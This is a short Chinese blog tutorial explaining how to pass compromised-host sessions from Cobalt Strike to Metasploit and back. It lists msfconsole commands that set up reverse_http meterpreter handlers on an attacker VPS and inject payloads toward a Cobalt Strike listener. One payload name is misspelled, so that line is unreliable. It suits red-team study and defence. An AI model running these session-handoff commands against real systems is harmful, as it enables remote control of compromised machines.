Cobalt Strike获得shell之后 如何与msf联动
作者:互联网
本机做cs,vps做msf
1.Cobalt Strike派生会话给Metasploit
(1)对msf进行设置
使用xshell连接vps,进入msfconsole
对msf的设置如下:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reversez_http
set lhost 172.(这边的ip是服务器的内网地址)
set lport 7777
(run)
(2)对cs进行设置
先设置一个新的监听,这边的IP地址为服务器的外网地址,payload为foreign HTTP,因为此cs不支持直接使用TCP,所以走HTTP的协议(上面的msf也是设置为http)
右击选择spawn(获得会话)功能,选择刚刚建立的监听器
可以看到msf界面如下,msf获得会话
可以尝试执行命令:
2.Metasploit派生会话转交给Cobalt Strike
(1)在cs新建一个监听
(2)msf设置cs正在监听的地址和端口
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true(禁用handler监听,因为我们已经建立监听了所以不用新建)
set lhost 47.
set lport 8088
此时在cs可以看到msf传递的派生出来的新的会话了!
标签:shell,payload,会话,Cobalt,cs,set,Strike,msf,监听 来源: https://blog.csdn.net/qiuqiunile_/article/details/120684472